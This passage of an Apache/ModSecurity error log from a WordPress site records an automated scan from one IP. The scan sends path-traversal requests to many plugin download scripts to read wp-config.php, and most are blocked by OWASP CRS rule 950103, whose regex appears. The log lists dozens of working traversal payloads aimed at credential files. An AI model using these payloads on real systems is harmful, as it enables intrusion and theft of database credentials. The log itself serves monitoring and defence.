[severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZEeelD754oNYNW-15_AYeAAAABU"] [Tue Apr 25 04:34:12.399703 2023] [:error] [pid 15889:tid 140447024371456] [client 37.120.213.169:41586] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordtube/wordtube-button.php"] [unique_id "ZEeelF4G6tVEc6w5Us7giQAAANA"] [Tue Apr 25 04:34:12.525377 2023] [:error] [pid 15580:tid 140446974015232] [client 37.120.213.169:41588] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZEeelN-GjcOLRjW9Sa4WGQAAAJY"] [Tue Apr 25 04:34:12.651799 2023] [:error] [pid 15580:tid 140446957229824] [client 37.120.213.169:41590] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "ZEeelN-GjcOLRjW9Sa4WGgAAAJg"] [Tue Apr 25 04:34:12.777917 2023] [:error] [pid 15580:tid 140447057942272] [client 37.120.213.169:41592] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "ZEeelN-GjcOLRjW9Sa4WGwAAAIw"] [Tue Apr 25 04:34:12.911685 2023] [:error] [pid 15580:tid 140447203165952] [client 37.120.213.169:41594] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-imagezoom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-imagezoom/download.php"] [unique_id "ZEeelN-GjcOLRjW9Sa4WHAAAAIM"] [Tue Apr 25 04:34:13.038167 2023] [:error] [pid 15889:tid 140447074727680] [client 37.120.213.169:41596] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-lytebox/main.php?pg=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-lytebox/main.php"] [unique_id "ZEeelV4G6tVEc6w5Us7gigAAAMo"] [Tue Apr 25 04:34:13.171570 2023] [:error] [pid 15889:tid 140447015978752] [client 37.120.213.169:41598] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-miniaudioplayer/map_download.php"] [unique_id "ZEeelV4G6tVEc6w5Us7giwAAANE"] [Tue Apr 25 04:34:13.297396 2023] [:error] [pid 15580:tid 140446965622528] [client 37.120.213.169:41600] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-mon/assets/download.php?type=octet%2Fstream&path=..%2F..%2F..%2F..%2F&name=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-mon/assets/download.php"] [unique_id "ZEeeld-GjcOLRjW9Sa4WHQAAAJc"] [Tue Apr 25 04:34:13.424358 2023] [:error] [pid 15889:tid 140447057942272] [client 37.120.213.169:41602] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-publication-archive/includes/openfile.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-publication-archive/includes/openfile.php"] [unique_id "ZEeelV4G6tVEc6w5Us7gjAAAAMw"] [Tue Apr 25 04:34:13.553332 2023] [:error] [pid 15580:tid 140447186380544] [client 37.120.213.169:41604] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZEeeld-GjcOLRjW9Sa4WHgAAAIU"] [Tue Apr 25 04:34:13.683427 2023] [:error] [pid 15580:tid 140447099905792] [client 37.120.213.169:41606] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-swimteam/include/user/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZEeeld-GjcOLRjW9Sa4WHwAAAIc"] [Tue Apr 25 04:34:13.811797 2023] [:error] [pid 15580:tid 140447041156864] [client 37.120.213.169:41608] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-table/js/wptable-button.phpp"] [unique_id "ZEeeld-GjcOLRjW9Sa4WIAAAAI4"] [Tue Apr 25 04:34:13.942467 2023] [:error] [pid 15580:tid 140447211558656] [client 37.120.213.169:41610] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"] [unique_id "ZEeeld-GjcOLRjW9Sa4WIQAAAII"] [Tue Apr 25 04:34:14.067701 2023] [:error] [pid 15580:tid 140447083120384] [client 37.120.213.169:41612] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wpeasystats/export.php?homep=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpeasystats/export.php"] [unique_id "ZEeelt-GjcOLRjW9Sa4WIgAAAIk"] [Tue Apr 25 04:34:14.199726 2023] [:error] [pid 15580:tid 140447108298496] [client 37.120.213.169:41614] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "ZEeelt-GjcOLRjW9Sa4WIwAAAIY"] [Tue Apr 25 04:34:14.325098 2023] [:error] [pid 15580:tid 140447032764160] [client 37.120.213.169:41616] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zingiri-forum/mybb/memberlist.php"] [unique_id "ZEeelt-GjcOLRjW9Sa4WJAAAAI8"] [Tue Apr 25 04:34:14.450295 2023] [:error] [pid 15580:tid 140447228344064] [client 37.120.213.169:41618] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php"] [unique_id "ZEeelt-GjcOLRjW9Sa4WJQAAAIA"] [Tue Apr 25 04:34:14.615167 2023] [:error] [pid 15580:tid 140447049549568] [client 37.120.213.169:41620] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/functions.php on line 8 [Tue Apr 25 04:34:14.615381 2023] [:error] [pid 15580:tid 140447049549568] [client 37.120.213.169:41620] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/functions.php on line 8 [Tue Apr 25 04:34:14.615512 2023] [:error] [pid 15580:tid 140447049549568] [client 37.120.213.169:41620] PHP Warning: require(ABSPATHWPINC/option.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/functions.php on line 8 [Tue Apr 25 04:34:14.615650 2023] [:error] [pid 15580:tid 140447049549568] [client 37.120.213.169:41620] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/option.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/functions.php on line 8 [Tue Apr 25 04:34:14.745207 2023] [:error] [pid 15580:tid 140447015978752] [client 37.120.213.169:41622] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=..%2F..%2F..%2F&filename=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/multi-plugin-installer/mpi_download.php"] [unique_id "ZEeelt-GjcOLRjW9Sa4WJwAAAJE"] [Tue Apr 25 04:34:14.882016 2023] [:error] [pid 15889:tid 140446990800640] [client 37.120.213.169:41624] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-document-embedder/libs/pdf.php"] [unique_id "ZEeell4G6tVEc6w5Us7gjQAAANQ"] [Tue Apr 25 04:34:15.007645 2023] [:error] [pid 15889:tid 140447099905792] [client 37.120.213.169:41626] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/file-away/lib/cls/class.fileaway_downloader.php?fileaway=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/file-away/lib/cls/class.fileaway_downloader.php"] [unique_id "ZEeel14G6tVEc6w5Us7gjgAAAMc"] [Tue Apr 25 04:34:16.517543 2023] [:error] [pid 15580:tid 140447007586048] [client 37.120.213.169:41634] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/document_manager/views/file_download.php?fname=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/document_manager/views/file_download.php"] [unique_id "ZEeemN-GjcOLRjW9Sa4WKAAAAJI"] [Tue Apr 25 04:34:16.644090 2023] [:error] [pid 15579:tid 